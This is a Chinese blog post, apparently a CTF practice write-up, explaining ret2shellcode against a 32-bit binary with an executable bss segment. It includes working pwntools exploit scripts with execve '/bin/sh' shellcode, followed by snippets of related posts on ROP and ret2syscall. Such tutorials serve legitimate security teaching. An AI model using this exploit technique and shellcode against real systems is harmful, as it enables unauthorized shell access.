基本ROP(二)

最新推荐文章于 2024-08-13 19:15:24 发布
原创 最新推荐文章于 2024-08-13 19:15:24 发布 · 1.6k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种利用ret2shellcode技术绕过二进制保护机制的方法。通过实际案例展示了如何利用程序的bss段权限,将shellcode置于栈上并控制程序执行,最终获取目标系统的shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

每日一结【第2天】

这年头果然不能随便立flag,随便有点啥事都能给耽误了,今天继续

二进制保护机制:http://www.mamicode.com/info-detail-1990426.html

ret2shellcode

原理:
ret2shellcode需要我们控制程序执行shellcode代码。而所谓的shellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。一般来说,shellcode都需要我们自己去填充。这其实是另外一种典型的利用的方法,即此时我们需要自己去填充一些可执行的代码。而在栈溢出的基础上,我们一般都是向栈中写内容,所以要想执行shellcode,需要对应的binary文件没有开启NX保护。

样例:ret2shellcode

第一步,先运行一下程序,顺道查看一下保护机制(偷个懒,不放那么多图了)
我们可以看到这个程序也是让输入一串字符,是32位程序,而且没有开启任何保护
这里写图片描述

然后扔进IDA里看一下,和上一题一样,存在栈溢出漏洞,我们双击buf2就会来到bss段,地址是0x0804A080(关于bss段戳这里
这里写图片描述

这里写图片描述

OK,现在大概已经了解一些了,使用上一次的方法调试一波,然后可得知输入的第一个字节距离ebp108个字节,距离ret地址112个字节
这里写图片描述

这个时候本次的重点来啦!!!

我们使用vmmap指令查看一下程序的内存,非(yi)常(liao)意(zhi)外(zhong)的发现,这个程序的bss段具有rwx权限,这就很令人开心啦,我们这次可以使用和上次不一样的方法
这里写图片描述
这一次,因为程序的bss段的权限足够,所以我们可以把shellcode直接布置到栈上,然后控制程序去执行

exp:

from pwn import *

r = process('./ret2shellcode')
shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode += "\x0b\xcd\x80"
buf2_addr = 0x804a080

r.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
r.interactive()

执行结果:
这里写图片描述

这里还有一份exp,不过不知道为啥我这边执行总是出错,大家有兴趣可以看一下
exp:

from pwn import *

r = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

r.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
r.interactive()
pwn小白入门04---ret2shellcode
weixin_45943522的博客
02-21 2117
原理 ret2shellcode,当程序当中没有system函数时,我们需要自己往栈上写入一段shellcode,然后控制eip使其指向shellcode的地址。 shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。 在栈溢出的基础上,要想执行 shellcode,需要对应的程序在运行时,shellcode 所在的区域具有可执行权限。即必须关闭堆栈不可执行功能。 例题(来自ctfwiki): 首先checksec: 发现程序没有开启任何保护,并且存在可读可写
pwn学习任务(
weixin_44319142的博客
12-31 1525
PWN学习任务() Python字符串处理 zio库用法 pwntools库用法 学习使用socat开端口运行程序 掌握ida远程调试方法 pwn题目远程调试的运行 Python字符串处理 撤销:Ctrl/Command + Z 重做:Ctrl/Command + Y 加粗:Ctrl/Command + B 斜体:Ctrl/Command + I 标题:Ctrl/Command + Shif...
ret2syscall(pwn第课)
s5555555___的博客
02-20 1918
xo.01 ret2syscall原理ret2syscall,即通过ROP控制程序执行系统调用,获取 shell。xo.02 ROP原理:随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是所谓 gadgets 就是以 ret 结尾的指令序列。例如:pop eax;ret这段代码的作用就是将。
CTFHUB-PWN-ret2shellcode
m0_64180167的博客
04-16 1281
几个大方向的思路:没有PIE:ret2libcNX关闭:ret2shellcode其他思路:ret2csu、ret2text 【程序本身有先检查开了什么保护没有开保护 并且是64 的放入ida64查看字符串发现没有shell我们看看主函数发现有read函数 但是没有shell我们现在要确定一些信息。
ret2syscall技术
weixin_44119101的博客
03-27 662
ret2syscall技术的原理大致为:从一个程序的进程空间去找一些函数汇编指令序列,然后通过堆栈操作构造execve("/bin/sh",null.null)这个函数,从而在利用溢出漏洞的时候去执行这个函数来获取系统调用。 execve("/bin/sh",null.null)函数的汇编程序为: pop eax, # 系统调用号载入, execve为0xb pop ebx, # 第...
基本ROP
m0_49959202的博客
08-14 1045
文章目录基本ROP1.原理1.1 概念原理1.2 分类1.2.1 ret2text1.2.2 ret2shellcode1.2.3 ret2syscall2.例题2.1 ret2text2.1.1 习题信息2.1.2 程序分析2.1.3 漏洞定位2.1.4 漏洞利用2.1.4.1 方法一:gdb手工计算2.1.4.2 方法:cyclic工具测算2.1.4.3 方法三:ida直接查看(不一定正确)2.1.5 exp编写2.2 retshellcode2.2.1 习题信息2.2.2 程序分析2.2.3 漏洞定
基本ROP技巧总结
极目楚天舒的博客
05-06 5856
ROP攻击前提:存在栈溢出并且可以控制返回地址存在满足条件的gadget,如果开启了PIE保护则要想办法泄露gadget的地址ret2text程序本身存在类似于system('/bin/sh')或者execv('/bin/sh')的片段,我们可以直接将返回地址覆盖为其地址跳转到已有代码上。例子:TODOret2shellcode这种方法要求我们自己构造shellcode并控制程序跳转到我们构造的s...
rop开放平台
04-12
1. **漏洞分析**:用户可以上传目标进制文件,平台会分析其是否存在适合构造ROP链的gadgets。 2. **ROP链生成器**:用户可以输入想要执行的命令或函数调用,平台会自动寻找合适的gadgets并构建完整的ROP链。 3. ...
ROP基本原理和实战教学,看这一篇就够了
QL_2023的博客
02-21 3346
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。通过上一篇文章栈溢出漏洞原理详解与利用,我们可以发现栈溢出的控制点是ret处,那么ROP的核心思想就是利用以ret结尾的指令序列把栈中的应该返回EIP的地址更改成我们需要的值,从而控制程序的执行流程。
ROP和Ret2libc漏洞
qq_67812668的博客
08-12 1137
ROP全称为Return-oriented Programming(返回导向式编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。
【PWN · ret2syscall | GoPwn】[2024CISCN · 华中赛区]go_note
Mr_Fmnwon的博客
07-02 1080
可以说是做的第一道GoPwn。。。进度确实太慢;此外,除了学习了对GoPwn的调试、逆向,也关注了Gadget利用的一些trick,ret2syscall也又一次进阶式地复习,收获良多。本题受益良多,开心。
KeyError: ‘i386/linux/syscalls/execve.asm
qq_45862829的博客
06-21 269
自学栈溢出漏洞碰到个问题记录一下。从网上下载shellcode源码出现KeyError: 'i386/linux/syscalls/execve.asm'
采用汇编手写shellcode写入栈解题ciscn_s_9
最新发布
2301_81504456的博客
08-13 567
因为执行pop ebp 把esp栈顶的值给ebp,esp加4h,执行ret,即pop eip,把修改后的返回地址 0x08048554给eip,esp加4h,此时esp距离s是28h(有点昏,参考其他文章),原先的20h(s的缓冲区已经不够,需要增加8h的大小)需要扩充,利用sub esp,0x28;2.接下来主要看栈的内部分配,已知s的输入点距离ebp为20h,加上ebp的4字节大小,共需要填充24h的shellcode(大小比这小,不够填充字节),再接上ret_addr,此时还未结束。
ShellCode自定位的几种实现方法
meanong的博客
05-28 2371
在编写shellcode的时候,经常需要定位当前程序的运行位置,所以在shellcode中定位运行的位置是一种常用的场景,本文记录了几种用于定位代码运行位置的方法。 [toc] 1.CALL/POP型 01 E8 00000000 call 06 将eip压栈,然后跳转到eip执行 06 58 pop eax 将eip出...
pwn学习-基本ROP
WocW的博客
03-03 2055
CTF-WIKI-pwn-基本ROP 漏洞复现 ret2text 首先检查程序的保护机制。 关于各个保护机制的介绍 :https://www.cnblogs.com/Spider-spiders/p/8798628.html 看到只开启了NX保护,即不可在栈上执行代码。 使用IDA查看源码,可以看到这里有一个危险的gets函数 以及这里有一个system函数 所以如...
Ret2Syscall绕过NX、ASLR保护
X丶 的博客
11-20 1587
Ret2Syscall,即控制程序执行系统调用,进而获取shell。 下面看看我们的vuln程序。 可以看出,程序中的gets有明显的 溢出漏洞 用gdb打开, 检查一下文件开启了哪些防护: 可以看出程序开启了 NX(栈不可执行)防护,那么,我们可以用ROP绕过防护 接来下,我们利用溢出漏洞来控制程序执行syscall(系统调用) 有关syscall系统调用的信息,可以在...
Exploit Exercises Protostar Stack Part 0-7
giantbranch的专栏
08-03 2093
Stack0 首先看下源码 #include <stdlib.h> #include <unistd.h> #include <stdio.h> int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(...
高级栈溢出技术—ROP实战(badchars)
ChuMeng1999的博客
01-09 917
目录预备知识关于ROP本系列rop实战题目的背景badchars涉及知识点实验目的实验环境实验步骤一实验步骤实验步骤三 预备知识 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战题目的背景 来自ROPEmpor
PWN基础10:Ret2Shellcode 32位实例
prettyX的博客
07-14 1197
0x01 Ret2Text的局限性
Ropper工具:分析进制文件与构建跨架构ROP
资源摘要信息:"Ropper是一个功能强大的Python工具,用于分析进制文件和帮助在各种体系结构...以上所述知识点涵盖了Ropper工具的基本功能、支持的技术以及使用方法,为进制分析和安全研究提供了有力的工具支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值